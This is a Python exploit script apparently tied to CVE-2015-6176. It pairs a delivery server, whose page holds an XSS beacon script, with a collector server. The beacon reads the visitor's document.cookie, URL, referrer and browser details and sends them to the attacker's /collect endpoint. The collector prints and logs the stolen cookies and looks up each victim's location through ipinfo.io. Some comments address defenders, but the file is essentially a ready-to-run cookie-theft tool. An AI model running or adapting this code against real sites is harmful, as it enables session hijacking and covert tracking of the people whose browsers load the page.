#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
PORT = 8080  # TCP port of the server that serves HTML_CONTENT (see run_exploit_server)
COLLECTOR_PORT = 9000  # TCP port of the server that receives the beacon GETs on /collect
# HTML page carrying the XSS beacon: on load its script reads document.cookie
# plus page/browser properties and sends them to the collector as an Image GET.
# {LOCAL_IP} and {COLLECTOR_PORT} are literal placeholders that
# ExploitHandler.do_GET substitutes at request time.
# Note for defenders: document.cookie cannot read cookies flagged HttpOnly, and a
# CSP that restricts img-src blocks the outbound Image request; the body text
# mentions an alert, but the script contains no alert() call.
HTML_CONTENT = b"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
try {
var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
var cookies = document.cookie || "";
var url = window.location.href;
var referrer = document.referrer;
var language = navigator.language || "";
var platform = navigator.platform || "";
var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || "";
var screenRes = screen.width + "x" + screen.height;
var data = {
cookie: cookies,
url: url,
referrer: referrer,
language: language,
platform: platform,
timezone: timezone,
screen: screenRes
};
var query = Object.keys(data).map(function(k) {
return encodeURIComponent(k) + "=" + encodeURIComponent(data[k]);
}).join("&");
var img = new Image();
img.src = attackerServer + "?" + query;
} catch(e) {
console.error("Error sending data:", e);
}
};
</script>
</head>
<body>
<h1 style="color:red;">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
"""
# Page returned by the collector after a /collect hit: a full-screen ocean
# photo with a centred message (UTF-8, so non-ASCII text is fine).
# The background image is fetched by the visiting browser from
# images.unsplash.com, i.e. a third-party request observable in that browser.
COLLECTOR_PAGE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Collected</title>
<style>
body {
margin: 0;
background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed;
background-size: cover;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
color: white;
font-family: Arial, sans-serif;
font-size: 2em;
text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
"""
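class ExploitHandler(http.server.BaseHTTPRequestHandler):
    """Serve HTML_CONTENT on ``/`` and ``/index.html``; every other path is 404.

    Derives from BaseHTTPRequestHandler (as CollectorHandler does) rather than
    SimpleHTTPRequestHandler: the latter inherits a do_HEAD that answers from
    the process's working directory, so HEAD requests would have disclosed
    which local files exist even though do_GET is fully overridden here.
    """

    _LANDING_PATHS = ('/', '/index.html')

    def do_GET(self):
        """Fill in the page placeholders and send the page, or reply 404."""
        if self.path not in self._LANDING_PATHS:
            self.send_error(404)
            return
        # local_ip is a module global assigned in the __main__ block.
        substitutions = {
            b"{LOCAL_IP}": local_ip.encode(),
            b"{COLLECTOR_PORT}": str(COLLECTOR_PORT).encode(),
        }
        body = HTML_CONTENT
        for placeholder, value in substitutions.items():
            body = body.replace(placeholder, value)
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)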
class CollectorHandler(http.server.BaseHTTPRequestHandler):
    """Receive the beacon GET on /collect, print it and append it to a log file.

    Every logged field comes straight from the query string of an inbound
    request, i.e. from whichever client hit the endpoint, and is written to
    stdout and to collected_data.log without any escaping.
    """

    def do_GET(self):
        """Handle GET: /collect records the submitted fields and returns COLLECTOR_PAGE; anything else is 404."""
        parsed_path = parse.urlparse(self.path)
        if parsed_path.path == "/collect":
            # parse_qs percent-decodes, so newlines or control characters in a
            # value reach the log verbatim (log-injection risk for the reader).
            query = parse.parse_qs(parsed_path.query)
            cookie = query.get("cookie", [""])[0]
            url = query.get("url", [""])[0]
            referrer = query.get("referrer", [""])[0]
            language = query.get("language", [""])[0]
            platform = query.get("platform", [""])[0]
            timezone = query.get("timezone", [""])[0]
            screen = query.get("screen", [""])[0]
            ip = self.client_address[0]
            user_agent = self.headers.get("User-Agent", "Unknown")
            # Naive local time, no timezone marker.
            timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            # Outbound third-party lookup happens for every /collect request,
            # including ones that carry no cookie.
            location = self.get_location(ip)
            if cookie:
                print(f"[{timestamp}] [+] Collected cookie: {cookie}")
                print(f" URL: {url}")
                print(f" Referrer: {referrer}")
                print(f" Language: {language}")
                print(f" Platform: {platform}")
                print(f" Timezone: {timezone}")
                print(f" Screen Resolution: {screen}")
                print(f" From IP: {ip}")
                print(f" User-Agent: {user_agent}")
                print(f" Location: {location}")
                print("-" * 50)
                # Save the collected information to a file.
                # NOTE(review): indentation was lost in this copy; the file write
                # is placed inside the `if cookie:` branch, matching the prints
                # above — confirm against the original.
                with open("collected_data.log", "a", encoding="utf-8") as f:
                    f.write(f"[{timestamp}] Cookie: {cookie}\n")
                    f.write(f" URL: {url}\n")
                    f.write(f" Referrer: {referrer}\n")
                    f.write(f" Language: {language}\n")
                    f.write(f" Platform: {platform}\n")
                    f.write(f" Timezone: {timezone}\n")
                    f.write(f" Screen Resolution: {screen}\n")
                    f.write(f" IP: {ip}\n")
                    f.write(f" User-Agent: {user_agent}\n")
                    f.write(f" Location: {location}\n")
                    f.write("-" * 50 + "\n")
            # Always answer 200 with the collector page, cookie or not.
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            content = COLLECTOR_PAGE.encode('utf-8')
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

    def get_location(self, ip):
        """Best-effort geolocation of *ip* via ipinfo.io, returned as a display string.

        Any failure (no network, non-200 status, non-JSON body) is swallowed
        and a fixed fallback string is returned. This makes an outbound HTTPS
        request to a third party for every call, which is a network-visible
        side effect of running this script.
        """
        # Use a free IP information service; degrade gracefully when offline.
        try:
            resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
            if resp.status_code == 200:
                data = resp.json()
                city = data.get("city", "")
                region = data.get("region", "")
                country = data.get("country", "")
                loc = data.get("loc", "")
                return f"{city}, {region}, {country} (coords: {loc})"
        except Exception:
            pass
        return "Location lookup failed or unavailable"
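def get_local_ip():
    """Return the IPv4 address of the interface that routes towards the internet.

    A UDP socket is "connected" to a public address; for UDP this only picks a
    route and source address, no packet is sent. When no route exists (offline
    host, sandbox) the loopback address is returned instead.

    Returns:
        The dotted-quad source address as a string, or "127.0.0.1".
    """
    # Context manager closes the socket on every path, replacing try/finally.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        try:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
        except OSError:
            # Narrowed from a bare Exception: socket failures (no route,
            # permission denied) all surface as OSError.
            return "127.0.0.1"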
def run_exploit_server():
    """Serve ExploitHandler on PORT until the process exits.

    Blocks the calling thread (in this script a daemon thread). Reads the
    module-level ``local_ip`` for the banner, so it must be assigned first.
    """
    address = ("", PORT)  # "" binds every interface, not just localhost
    with socketserver.TCPServer(address, ExploitHandler) as httpd:
        print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html")
        httpd.serve_forever()
def run_collector_server():
    """Serve CollectorHandler on COLLECTOR_PORT until interrupted.

    Blocks the calling thread (in this script the main thread). Reads the
    module-level ``local_ip`` for the banner, so it must be assigned first.
    """
    address = ("", COLLECTOR_PORT)  # "" binds every interface, not just localhost
    with socketserver.TCPServer(address, CollectorHandler) as httpd:
        print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect")
        httpd.serve_forever()
if __name__ == "__main__":
    # Assigned at module level on purpose: the handlers and run_* functions
    # read local_ip as a global.
    local_ip = get_local_ip()
    try:
        print(f"[*] Your server IP is: {local_ip}")
        # Daemon thread so the process ends when the main thread does.
        delivery_thread = threading.Thread(target=run_exploit_server, daemon=True)
        delivery_thread.start()
        run_collector_server()  # blocks the main thread
    except KeyboardInterrupt:
        print("\n[!] Shutting down servers. Goodbye!")